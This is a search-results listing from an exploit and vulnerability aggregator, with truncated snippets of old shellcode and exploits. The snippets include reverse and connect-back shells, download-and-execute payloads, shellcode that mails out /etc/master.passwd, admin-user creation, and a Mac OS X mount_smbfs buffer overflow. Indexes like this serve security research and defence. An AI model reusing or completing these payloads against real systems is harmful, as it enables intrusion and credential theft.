Lucene search
+L

7304 matches found

seebug.org
seebug.org
added 2007/12/20 12:0 a.m.19 views

Windows 9x/NT/2k/XP Reverse Generic Shellcode w/o Loader 249 bytes

No description provided by source. We use the PEB for the Output/Input/Error Handles. typedef struct PEB BOOLEAN InheritedAddressSpace ; BOOLEAN ReadImageFileExecOptions ; BOOLEAN BeingDebugged ; BOOLEAN Spare ; HANDLE Mutant ; PVOID ImageBaseAddress ; PPEB LDR DATA LoaderData ; PRTL USER PROCESS...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.19 views

windows/XP download and exec source

No description provided by source. ; Nice theorhetically generic url download and execute ; shellcode for Windows XP. ; ; Heck, atleast it saves you using tftp! ; ; [email protected] ; ; nasmw -s -fbin -o download.s download.asm bits 32 start: jmp short avoidnastynulls continue: pop edi ; edi...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.26 views

Windows 9x/NT/2k/XP PEB method 35 bytes

No description provided by source. /This is a 35 byte C implementation of the use of the PEB method to get the kernel32 base address on Windows. This is generic code designed to run on both Windows 9x and NT based systems. The code has been optimized to not have any 00h bytes so that you wont hav...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.22 views

win32 Download & Exec Shellcode 226 bytes+

No description provided by source. / \ WINSHELLCODE / :: win32 download & exec shellcode :: \ :: by Darkeagle of Unl0ck Research Team http://exploiterz.org :: / :: to avoid 0x00 use ^^xor^^ : ::...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.21 views

bsd/PPC execve /bin/sh 128 bytes

No description provided by source. / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's BSD PPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.17 views

bsd/x86 cat /etc/master.passwd | mail [email] 92 bytes

No description provided by source. / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 92 bytes. execve/bin/sh -c "/bin/cat /etc/master.passwd|mail root@localhost"; pueden reemplzar el comando por lo que se les ocurra. / char shellcode=...

7.1AI score
SaveExploits0
Packet Storm
Packet Storm
added 2007/12/20 12:0 a.m.54 views

applesmb-overflow.txt

/ Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179 http://seclists.org/fulldisclosure/2007/Dec/0445.html...

6.6CVSS0.01641EPSS
SaveExploits5
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.45 views

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

No description provided by source. / Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179...

6.6CVSS0.3AI score0.01641EPSS
SaveExploits5
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.32 views

BSD Passive Connection Shellcode

No description provided by source. ; Passive Connection Shellcode ; ; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl ; Buffer0verfl0w Security ; Why? This evades firewalls... ; ; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable ;...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.23 views

Windows NT/2k/XP useradd shellcode for russian systems 318 bytes

No description provided by source. / \ win32 useradd shellcode for russian systems / by Darkeagle \ ExploiterZ Lab / http://exploiterz.org \ / // add user "slim" with password "shady" with admin prem. in Russian Systems unsigned char data318 = 0xEB, 0x0F, 0x58, 0x80, 0x30, 0x17, 0x40, 0x81, 0x38,...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.18 views

linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes

No description provided by source. / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik [email protected] / char shellcode = "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x68\x6e\x64\x6f\x6d" // push $0x6d6f646e "\x68\x2f\x75\x72\x61" // push $0x6172752f...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.18 views

win32/xp sp2 Pop up message box 110 bytes

No description provided by source. / Author : Omega7 Assembly Code : Steve Hanna Changed by : Omega7 Description : It is 110 Byte Shellcode which Pops up Message Box Under Windows Xp SP2 If you Want to use it in any other Windows You need to change the address that i have marked! / include stdlib...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.36 views

linux/ppc read & exec shellcode 32 bytes

No description provided by source. / readnexecppc-core.c by Charles Stevenson [email protected] / char hellcode = / read0,stack,1028; stack; linux/ppc by core / "\x7c\x63\x1a\x79" / xor. r3,r3,r3 / "\x38\xa0\x04\x04" / li r5,1028 / "\x30\x05\xfb\xff" / addic r0,r5,-1025 / "\x7c\x24\x0b\x78" / mr...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.23 views

MS Windows (DCOM RPC2) Universal Shellcode

No description provided by source. ; Segment type: Pure code ;seg000 segment byte public 'CODE' use32 ; assume cs:seg000 ; assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing .386 assume cs:seg000 var29C = byte ptr -29Ch var28C = byte ptr -28Ch var25F = byte ptr -25Fh var254 = dword...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.24 views

bsd/x86 reverse portbind 129 bytes

No description provided by source. / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on 6969/tcp / / [email protected] / char shellcode = 0x31,0xc9,0x51,0x41, ...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.15 views

win xp/2000/2003 Download File and Exec 241 bytes

No description provided by source. / ----------------------------------------------------------------------- downloadurlv31.c - Download file and exec shellcode for Overflow exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : lioncnhonker.net...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.30 views

win xp/2000/2003 Connect Back shellcode for Overflow exploit 275 bytes

No description provided by source. / ----------------------------------------------------------------------- connectbackv32.c - Connect Back shellcode for Overflow exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : [email protected]...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2007/12/20 12:0 a.m.23 views

linux/ppc execve /bin/sh 112 bytes

No description provided by source. / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode = / Palante's linuxPPC shellcode w/ NULL/ 0x7CC63278, 0x2F867FFF, 0x41BC0054, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,...

7.1AI score
SaveExploits0
exploitpack
exploitpack
added 2007/12/19 12:0 a.m.88 views

Apple Mac OSX - mount_smbfs Local Stack Buffer Overflow

Apple Mac OSX - mountsmbfs Local Stack Buffer Overflow / Copyright C 2007-2008 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: CVE-2007-3876 http://docs.info.apple.com/article.html?artnum=307179...

6.6CVSS0.5AI score0.01641EPSS
SaveExploits5
zdt
zdt
added 2007/12/19 12:0 a.m.54 views

Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit

Exploit for macOS platform in category local exploits ============================================================== Apple Mac OS X mountsmbfs Stack Based Buffer Overflow Exploit ============================================================== / Copyright C 2007-2008 Subreption LLC. All rights...

6.8AI score0.01641EPSS
SaveExploits5
Rows per page
Query Builder